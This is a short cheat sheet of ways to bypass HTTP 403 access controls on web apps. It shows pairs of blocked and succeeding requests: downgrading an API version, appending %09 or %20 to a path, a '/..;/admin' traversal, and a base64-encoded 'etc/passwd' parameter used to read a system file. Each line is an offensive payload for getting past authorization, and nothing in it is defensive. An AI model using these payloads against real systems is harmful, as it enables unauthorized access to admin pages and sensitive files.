GET api/v3/offers/ => 403 access deneid 
GET api/v2/offers/ => 200 OK 
---------------------------------

Original URL: https://webapp.com/api.php --> 403 Forbidden
Modified URL: https://webapp.com/api.php (%09) --> 200 OK

-------------------------------------

url/?f=etc/passwd ==> 403
url/?f=L2V0Yy9wYXNzd2Q= ==> 200      #encode etc/passwd as base64

-----------------------------------------

/admin ==> 403
/admin%09 ==> 200
/admin%20 ==> 200

-------

Traversal
/admin ==> 403
/..;/admin ==> 200
